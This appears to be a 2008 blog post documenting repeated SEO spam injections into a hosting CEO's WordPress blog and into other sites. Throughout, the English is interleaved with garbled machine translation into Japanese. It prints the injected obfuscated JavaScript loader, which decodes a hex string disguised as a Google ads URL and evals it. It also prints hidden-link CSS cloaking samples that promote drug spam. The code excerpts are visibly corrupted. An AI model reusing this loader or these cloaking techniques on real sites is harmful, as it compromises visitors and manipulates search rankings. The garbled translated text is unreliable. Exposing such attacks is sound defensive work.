Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II マットヒートンBluehost HostmonsterのCEO 、再びハッキング-スト2世

Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com . SEOのスパム業者によってハッキングされているMattheaton.comで年1回のイベントのように見える 。 Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record).マットのワードプレスのブログの最初の2か月前2007年11月26日（私の記録によれば）にハイジャックされた。 You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked .あなた→ マットヒートンのCEO 、公式ブログBlueHost HostMonsterハッキング被害で、私の以前の投稿ディグすることができます。

It’sa big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . bluehost ＆ hostmonsterの社長さんのブログ 毎年 spamride 2007 （ ）以降にホスティングされているが備わって大恥。 Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.掘削ヒートンマットの悪い習慣で広告Blackhat迷惑メールの問題を解決する、私は明細部分を推測するために、読者に任されます。

Mattheaton Goro Spam Chronology Mattheaton五郎年表マーク

Wordpress.net.in GORO Spam Pattern Wordpress.net.in吾朗マークパターン

• All the infected sites will stop being index by archive.org few months before the spam started.スパムを開始する前に、すべての感染したサイトをインデックスに登録されて数ヶ月archive.orgが停止されます。
• From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x) 2007年11月2008年1月に（右後にGoogleのマスデP3 -ランク熱） -B lackhat吾朗スパマーからP R6＆ P R7サイトワードプレス（ 2 .3.1以下）で実行していると一部のまれなケース（ t angonoticias.com） J oomlaC MSをターゲットにしている（ 1.0.xへ）
• I categorize this blackhat method as Sybil Attack私はシビル攻撃には、 blackhat法の分類
  

  A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence.シビル攻撃の1つは、攻撃者がペンネームのエンティティの数多くのシステムを作成して、評判を覆すであり、不釣り合いに大きな影響力を得るためにそれらを使用しています。 A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.は、シビル攻撃への評判システムの脆弱性をどのように安くSybils生成することが可能に依存し、これには、評判システムのエンティティからの信頼の連鎖は、信頼できるエンティティにリンクしていない入力を受け付ける度かどうかは、評判システム同じすべてのエンティティを扱います。

  - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) -D erankとその犠牲者のホストを操作するより良いS ERP） G oogleローカルの検索インデックスの製薬製品（ゲームL ocalrankを高めるに

• Goro signatures:吾朗署名：
  1. html div with id “goro”アイダホ"吾朗とHTMLのdivを"

      <div id="goro"> <a href=">...</a> </div> <div id="goro">の<a href="> ...</ 1 > < / divを> 
     

  2. javascript function name “getme()” JavaScript関数名" getme （ ） "

      <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <script type="text/javascript">機能getme （ STR ）の（ Varのidx = str.indexOf ('?');場合（ idx == -1 ）を返すのSTR ; Varのレン= str.length ; Varのnew_str = ' ' ; Varの私= 1 ;の（     idx ; idx <レン; idx   = 2 、私    ） （ Varのチャンネル= parseInt （ str.substr （ idx 、 2 ） 、 16 ） ; new_str   = String.fromCharCode （ （チャンネル  1 ） ％ 256 ） ; ）エバール（ new_str ） ; ） getme （ ' http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306 ' ） ; < /スクリプト> 
     

  3. Output spam on WordPress wp_footer & wp_head hookワードプレスwp_footer ＆ wp_headフックに出力マーク

Blackhat SEO Spamdexing Google Local Search Index SEOのスパムデキシングBlackhat Googleローカルの検索インデックス

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.グラフの下にGoogleローカルSERPの操作のためのSEOのBlackhatスパムデキシングの方法について説明します。

View Spamdexing Google Local Search Image Googleローカル検索のイメージを見るスパムデキシング

Note: A blackhat at hoqwarts ;)注記： hoqwartsでblackhat ; ）

ScreenGrab

• mattheaton.com Jan 28 2008 (1009 x 6576 pixels) mattheaton.com 2008年1月28日 （ 1009年のX 6576ピクセル）
• brainwave-india.com Jan 28 2008 (1016 x 2306 pixels) brainwave - india.com 2008年1月28日 （ 1016年のX 2306ピクセル）
• Google Local Search Jan 28 2008 Spamdexing Results Googleローカルの検索2008年1月28日スパムデキシング結果
• stc-israel.org.il Jan 28 2008 spamdexing page (hidden text) エスティーシー- israel.org.il 2008年1月28日スパムデキシングページ（隠しテキスト）
• stc-israel.org.il Jan 28 2008 spamdexing page (text reveal) エスティーシー- israel.org.il 2008年1月28日スパムデキシングページ（テキストを明かす）

Recent Update最近の更新

• Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. 2008年2月1日 -私たちはこの問題についてm att@bluehost.comに手紙を送ってください。 Still waiting for his repliesそれでも彼の返事を待って
• Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer . 2008年2月3日 -B lackhat吾朗スパマーh ttp://www.brainwave-india.com（ P R6） （ P R6） h ttp://www.thinkingphp.org- フェ リックスGe isendörferからのター ゲットsp amhost変更してください。

   <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (  idx; idx < len; idx  = 2,i  ){ var ch = parseInt(str.substr(idx, 2), 16); new_str  = String.fromCharCode((ch   i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script> <div id="goro">の< a href = " http://www.thinkingphp.org/?read=796 ...処方< / a >を< / divを> <script type="text/javascript">機能（ STR ）の（ Varのidx = str.indexOf ('?'); getme場合（ idx == -1 ）を返すのSTR ; Varのレン= str.length ; Varのnew_str = '' ; Varの私= 1 ;の（     idx ; idx <レン; idx   = 2 、私    ） （ Varのチャンネル= parseInt （ str.substr （ idx 、 2 ） 、 16 ） ; new_str   = String.fromCharCode （ （チャンネル  1 ） ％ 256 ） ; ）エバール（ new_str ） ; ） getme （ ' http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306 ' ） ; < /スクリプト> 

  thinkingphp.org blog is running on WordPress 2.3.2 . thinkingphp.orgブログワードプレス2.3.2上で実行されています。 We send him email regarding the Goro Spam hijack .私たちは彼の吾朗ハイジャックに関するスパムメールを送信します。

• Feb 8th 2008 , There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6) . 2008年2月8日 、迷惑メールの署名が吾朗マットさんのブログは、 blackhatにアイダホ吾朗（タグ）は現在、スパムを非表示にインラインCSSのポジションオーバーフローを使用している↓ （ PR6 ） zoorender.com にリダイレクト リンクしています 。

   <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. <div style="left: -2227px; position: absolute; top: -3337px">の<a href="http://www.zoorender.com/?discount=1776"> ..買い </div> < / divを> 
  

• Feb 13th 2008 , Same methods as above (inline css cloacking) . 2008年2月13日 、 （上記のCSSをインラインcloackingと同じ方法） 。
  • HTML Code shown to a Regular Browser → 32,246 characters HTMLコードは、通常のブラウザ→ 32246に文字を表示
  • HTML Code shown to Google Bot → 34,646 characters HTMLコードのGoogleボット→ 34646に文字を表示

  redirect to blog.jensfranke.com (PR7) . （ PR7 ） blog.jensfranke.comにリダイレクトされる 。

   <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi <div style="left: -2227px; position: absolute; top: -3337px">の<a href="http://blog.jensfranke.com/?read=606">一般的なFiを買う 
  

• Feb 20th 2008 , CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6) . 2008年2月20日 、 CSSをCloackingリダイレクトhttp://www.entrepreneur27.org/ （ PR6 ） 。

   <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ... <div style="left: -2227px; position: absolute; top: -3337px">悪いの<a href="http://www.entrepreneur27.org/?more=1591">バイアグラの副作用< / a >をの<a href="http://www.entrepreneur27.org/?more=1592"> ... 
   </div> < / divを> 
  

• Feb 24th 2008 , CSS Cloacking redirect to http://www.latenightpc.com (PR5) . mattheaton-com-022408-source.txt 2008年2月24日 、 CSSをCloacking （ PR5 ） 。 mattheaton コム- 022408 - source.txt http://www.latenightpc.comにリダイレクト
• Feb 26th 2008 , CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6) . mattheaton-com-022608-source.txt 2008年2月26日 、 CSSをリダイレクトするCloacking http://www.communitynext.com/ワードプレス2.3.3 （ PR6 ） 。 mattheatonコム- 022608 - source.txt

Related Posts関連記事

• How to Removed wordpress.net.in Spam Injection 迷惑メールを削除する方法wordpress.net.inインジェクションに
• Matt Heaton BlueHost HostMonster CEO Official Blog Hacked マットヒートンのCEO 、公式ブログBlueHost HostMonsterハッキング

External Links外部リンク

• Bluehost & Hostmonster CEO’s Blog Bluehost ＆ Hostmonster CEOのブログ
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities 国立脆弱性データベース（ NVD ）ワードプレス2.0で> 2.0.5の脆弱性
• Wikipedia → Spamdexing ウィキペディア→スパムデキシング
• pseudo-flaw - more random wordpress blogs owned by seo spammers 擬似欠陥-その他のランダムなワードプレスのブログソスパマーが所有